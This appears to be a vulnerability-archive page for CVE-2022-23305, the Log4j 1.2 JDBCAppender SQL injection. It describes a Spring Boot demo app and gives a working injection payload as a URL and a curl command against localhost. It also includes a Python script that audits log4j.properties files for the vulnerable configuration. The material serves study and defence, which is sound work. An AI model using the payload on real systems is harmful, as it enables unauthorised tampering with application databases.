Related vulnerability
Title: Apache Log4j SQL injection vulnerability (CVE-2022-23305)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Foundation (USA). Apache Log4j has a SQL injection vulnerability. It stems from the JDBCAppender in Log4j 1.2.x accepting a SQL statement as a configuration parameter, where the values to be inserted are converters from PatternLayout. The message converter %m is likely always included. This allows an attacker to manipulate the SQL by entering crafted strings into the input fields or headers of an application that logs them, allowing unintended SQL queries to be executed. Note that this issue only affects deployments specifically configured to use JDBC
Description
CVE-2022-23305 Log4J JDBCAppender SQL injection POC
Introduction
# CVE-2022-23305 Log4j JDBCAppender SQL injection POC
This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken as a URL query string parameter. Since Log4J is configured to use a JDBCAppender, it is vulnerable to SQL injection.
See src/main/java/poc/InjectionController.java for the logging statement.
See the src/main/resources folder for all the configuration files.
You can run the application using Java and Maven by running "mvn clean spring-boot:run".
You can also run it as a Docker application:

```
docker build --tag log4j-poc .
docker run -p 8080:8080 log4j-poc
```
The app will be available at http://localhost:8080/.
To exploit the vulnerability, submit an injected SQL statement as the parameter which is getting logged:

```
http://localhost:8080/?param=');insert into logs values(':(
```
The return will list the added log entries, containing one that was added by the sql injected into the parameter.
To do the same with curl use:

```
curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('
```
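The configuration this PoC depends on (a Log4j 1.2.x JDBCAppender whose `sql` option embeds the `%m` message converter) can be found by auditing `log4j.properties` files before they reach production. The following script is an added example, not code from the PoC repository; the sample properties text is constructed, while `org.apache.log4j.jdbc.JDBCAppender` and its `sql` option are the real Log4j 1.x names.

```python
import re
from typing import Dict, List

# Constructed sample modelled on a Log4j 1.2.x JDBCAppender setup; not the PoC's own file.
SAMPLE_LOG4J_PROPERTIES = """
# console appender: pattern layout is harmless here, output is not a SQL statement
log4j.rootLogger=INFO, db, console
log4j.appender.console=org.apache.log4j.ConsoleAppender
log4j.appender.console.layout=org.apache.log4j.PatternLayout
log4j.appender.console.layout.ConversionPattern=%d %p %m%n
# JDBC appender: the logged message (%m) is spliced verbatim into the INSERT statement
log4j.appender.db=org.apache.log4j.jdbc.JDBCAppender
log4j.appender.db.URL=jdbc:h2:mem:testdb
log4j.appender.db.sql=INSERT INTO logs VALUES ('%d{ISO8601}', '%p', '%m')
"""

JDBC_APPENDER_CLASS = "org.apache.log4j.jdbc.JDBCAppender"
APPENDER_PREFIX = "log4j.appender."
# %m optionally carrying a width/precision modifier such as %-20m or %.30m
MESSAGE_CONVERTER = re.compile(r"%-?\d*\.?\d*m")


def parse_properties(text: str) -> Dict[str, str]:
    """Minimal parser for the key=value lines of a Java .properties file."""
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def find_injectable_jdbc_appenders(text: str) -> List[str]:
    """Names of JDBCAppenders whose SQL template embeds the %m converter.

    A JDBCAppender builds its statement by pattern substitution, so any %m in
    the sql option means attacker-influenced log text lands inside the query.
    """
    props = parse_properties(text)
    flagged = []
    for key, value in props.items():
        # "log4j.appender.<name>" (exactly two dots) declares the appender class
        if key.startswith(APPENDER_PREFIX) and key.count(".") == 2 and value == JDBC_APPENDER_CLASS:
            name = key[len(APPENDER_PREFIX):]
            if MESSAGE_CONVERTER.search(props.get(f"{APPENDER_PREFIX}{name}.sql", "")):
                flagged.append(name)
    return flagged


if __name__ == "__main__":
    print("injectable JDBC appenders:", find_injectable_jdbc_appenders(SAMPLE_LOG4J_PROPERTIES))
```

A flagged appender is the setup CVE-2022-23305 describes; since Log4j 1.2 is end-of-life, the remediation is to remove the JDBCAppender rather than to rewrite its pattern.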
File snapshot

```
[4.0K] /data/pocs/16d36d5240b2db6601d42cbc85b2e1cbd3b741d8
├── [ 160] Dockerfile
├── [1.2K] pom.xml
├── [1.2K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] poc
        │       ├── [ 332] Application.java
        │       └── [1.2K] InjectionController.java
        └── [4.0K] resources
            ├── [ 185] application.properties
            ├── [ 355] log4j.properties
            └── [  76] schema.sql

5 directories, 8 files
```
Notes
1. It is recommended to access the POC through its original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating towards the local POC. Thank you for your support.